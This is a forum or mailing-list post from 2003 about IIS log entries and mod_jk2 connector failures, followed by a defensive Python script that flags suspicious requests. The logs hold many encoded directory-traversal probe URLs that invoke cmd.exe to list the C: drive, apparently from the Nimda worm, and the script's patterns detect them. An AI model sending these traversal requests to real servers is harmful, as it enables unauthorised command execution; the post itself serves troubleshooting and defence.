I'm receiving some interesting warning messages from the mod_jk2 connector and from IIS in general.
In my IIS log:

2003-03-04 09:14:08 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:10 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:11 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:12 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:12 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /c/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:14 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:15 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:16 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /d/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:17 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:17 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:19 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:14:19 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:14:21 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:22 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:41 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:14:41 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:22 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:24 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:27 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:15:27 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:15:29 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:35 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:37 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..A..A..A..Awinnt/system32/cmd.exe /c+dir+c:\ 403 -

Note: I've removed the IP addresses from the above messages and replaced them with xxx.xxx.xxx.xxx.
In my Windows Application Event Log:

Error: [jk_isapi_plugin.c (316)]: HttpFilterProc [/scripts/..%5c../winnt/system32/cmd.exe] contains one or more invalid escape sequences.
Error: [jk_isapi_plugin.c (316)]: HttpFilterProc [/scripts/..%5c../winnt/system32/cmd.exe] contains one or more invalid escape sequences.
Emerg: [jk_isapi_plugin.c (324)]: HttpFilterProc [/scripts/..A/../winnt/system32/cmd.exe] contains forbidden escape sequences.
etc....

These emergencies and errors are followed by many warnings indicating that the connector workers have failed to forward to my Tomcat instance. The workers are later re-enabled. These warning messages appear about every 4-5 hours. Initially, they don't seem to affect the Tomcat connector, but, after the warnings are logged, if a user accesses the site, it takes an exceptionally long time for a page to be served. In watching the logs, the connector is reporting a bunch of connection failures, but it eventually recovers and re-enables. The site works fine afterwards. On some occasions, IIS must be stopped/started in order for the site to behave normally.

Has anyone else witnessed this in a production environment? The kicker is that I cannot reproduce this problem on my development/testing machines. I've load tested those environments and the connector is performing beautifully. It was only once I pushed to production and made IIS (damn IIS) available to the outside world. I've searched on the web, and it seems like these are indications of the NIMDA virus scanning the computer looking for vulnerabilities.

Has anyone else seen these messages/errors? Why would they be hurting the Tomcat connector? Any suggestions?
Steve
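A defender-side triage script for IIS log entries like the ones in the post, added here as an example rather than code from the thread, mod_jk2 or IIS: it parses the whitespace-delimited W3C layout shown above, percent-decodes each URI stem (twice, to catch double encoding), tags the traversal/cmd.exe probes and the bare 400 entries, and counts flagged requests per client address so a scanner burst stands out. The sample lines are constructed in the same layout with RFC 5737 documentation addresses in place of the poster's redacted IPs.

```python
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines (not the poster's real log), in the field layout the
# post shows: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem
# cs-uri-query sc-status -. Addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
2003-03-04 09:14:08 192.0.2.10 - 198.51.100.5 80 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\\ 403 -
2003-03-04 09:14:19 192.0.2.10 - 198.51.100.5 80 - - - 400 -
2003-03-04 09:15:25 192.0.2.10 - 198.51.100.5 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\\ 403 -
2003-03-04 09:15:43 192.0.2.10 - 198.51.100.5 80 HEAD /scripts/..A..A..A..Awinnt/system32/cmd.exe /c+dir+c:\\ 403 -
2003-03-04 09:16:00 192.0.2.77 - 198.51.100.5 80 GET /index.jsp - 200 -
"""
FIELDS = ("date", "time", "c_ip", "user", "s_ip", "port",
          "method", "stem", "query", "status", "extra")

def parse_line(line):
    """Split one whitespace-delimited entry into a dict; None if the layout differs."""
    parts = line.split()
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def normalize(stem):
    """Percent-decode twice (catches double encoding), fold '\\' to '/', lower-case."""
    for _ in range(2):
        stem = unquote(stem)
    return stem.replace("\\", "/").lower()

def classify(entry):
    """Return the set of reasons this entry looks like a scanner probe (empty if benign)."""
    tags = set()
    path = normalize(entry["stem"])
    if "../" in path:
        tags.add("traversal")          # ..%5c and .%2e sequences decode to ../
    if "/system32/" in path or path.endswith("cmd.exe"):
        tags.add("system-binary")      # no legitimate site URL names cmd.exe
    if entry["method"] == "-" and entry["status"] == "400":
        tags.add("malformed-request")  # IIS could not parse a request line at all
    return tags

def scan(log_text):
    """Return (flagged entries with their tags, flagged-entry count per client IP)."""
    flagged, per_source = [], Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and (tags := classify(entry)):
            flagged.append((entry, tags))
            per_source[entry["c_ip"]] += 1
    return flagged, per_source
```

Feeding a day's log through scan() and sorting per_source gives the addresses responsible for the bursts, which is what you would correlate against the timestamps of the mod_jk2 errors and worker failures.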